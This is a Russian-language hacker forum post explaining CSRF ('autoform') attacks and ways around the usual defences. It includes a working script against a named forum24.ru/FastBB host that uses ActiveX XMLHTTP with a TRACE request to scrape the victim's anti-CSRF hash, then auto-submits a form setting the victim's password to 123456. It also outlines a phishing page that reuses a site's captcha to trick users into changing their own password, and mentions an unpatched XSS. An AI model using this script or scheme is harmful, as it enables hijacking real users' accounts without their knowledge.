Как известно большинство крупных движков форумов защищаются от автоформ различными способами. в этой теме (так как на статью не тянет))) я преведу примеры одного из способов обхода защиты от таких автоформ но прежде обьяснью что такое автоформа
(описание что такое автоформ-уязвмости и способы защиты от них предоставлены для новичков в позновательно-ознакомитеьных целях так что судари не бранитесь ))
.................................................. .......................................
например есть профиль юзера где он может изменить любую нужную информацию в том числе емайл для востановления парля и изменение самого пароля итд. и собвстенно существует запрос для изменения этой инфы пусть примером будет www.site.ru/profile.php?user=zet&email=negr@mail.ru
тоесть отправив такой запрос юзер имея авторизоанные куки(кто сохраняет пароль) пройдя по нему изменит свою инфу
так что мешает заманить жертву нна такую страницу например с кодом
<img src=www.site.ru/profile.php?user=zet&email=negr@mail.ru>
тоесть жертва замент свой емайл для востановления пароля даже этого не заметив . в принципе эта уязвимость и называется автоформа
так вот существуют методы защиты от таких автоформ
приведу самые распостранённые примеры
1. капча (картина защиты) тость к запросу прибавляется переменная этой картинки
например
www.site.ru/profile.php?user=zet&email=negr@mail.ru&kapcha=g32 4gj42
тоесть если юзер вводит неправильный код с картинки то запрос отклоняется сервером и собственно сгенерировать эту переменную капчи довольно проблематично
2. это ввод действующего пароля для изменении информации тоесть к запросу добавляется переменная пароля . и незная его пароля мы эту автоформу не создадим
3. При заходе на свой профиль страница генерирует хэш юзера (который собственно с генерировать мы тоже не можем) тоесть к запросу добавляется переменная которая содержится только на страницы жертвы
.................................................. ...................................
так вот собственно сам метод
с помощью актив икс мы можем получить содержимое страницы и причом с куками жертвы так как запрос выполняется с клиента
Код:
<SCRIPT>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://yandex.ru/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();
alert(x.responseText);
</SCRIPT>
так вот собственно если выдрать с страницы жертвы эту переменную хэша (на фастбб сужествует защита именно п охэшу) и отправить автоформу на смену пароля то мы поменяем жертве пароль на свой если он зайдёт на эту страницу. ну и собственно сам скрипт на примере фастбб
Код HTML:
<SCRIPT>
function autoform () {
document.newuser.submit();
}
</SCRIPT>
<BODY onload='autoform()'>
<form name=newuser action=http://eeweqw.forum24.ru/ method=POST>
<SCRIPT>
document.write("<input tupe=text name=parol value=");
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://eeweqw.forum24.ru/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();
red=x.responseText.lastIndexOf("parol");
green=x.responseText.lastIndexOf("modraz");
for (var i = red+7; i < green-2; i++)
{
zet=x.responseText.charAt(i);
document.write(zet);
}
document.write(">");
</SCRIPT>
<INPUT NAME='work' TYPE='hidden' value='32'>
<INPUT NAME='razdel' TYPE='hidden' value='zalupa'>
<INPUT NAME='newpass' TYPE='hidden' value='123456'>
немножко его обьяснь если непротив
http://eeweqw.forum24.ru - аткакуемый хост
parol и modraz - значения в странице кода с помощью которых находится эта переменная хэша (она находится между ними + там разные символы они в цикле отфильтрованы)
zalupa - имя пользователя в форуме. увидеть это имя можно просмотрев профиль юзера-жертвы например http://жертва.forum24.ru/?zalupa значит имя жертвы zalupa
ну и так жертва зашедшая на страницу с таким кодом меняет свой дейтсвующий пароль на 123456
Ps актуально только под осликом так как актив икс в других браузерах нету
.................................................. .................................
и ещё мысли по обходу защиты с каптчей. например выдираем src этой каптчи и выводим на страницу картинку с такимже src и дальше добавляем поля регестрации и заманиваем на неё с помощью метода зарегаешся бесплатно дам 7мизнак и темсамым регаясь на этом псевдосайте он вводит цифры с капчи для замены своего пароля и нажав кнопочку "Зарегит" отправляет запрос на смену своего пароля
.................................................. .........................................
а вот форму с вводом действещего пароля(как на форуме античата) я пока непредумал. но небеда пассивную хсс на форуме ещё не прикрыли
(пс: привет ponchik это sibon)
несудите строго. если что не понятно могу разьяснить
если считаете что тема достоина статьи то можете переместить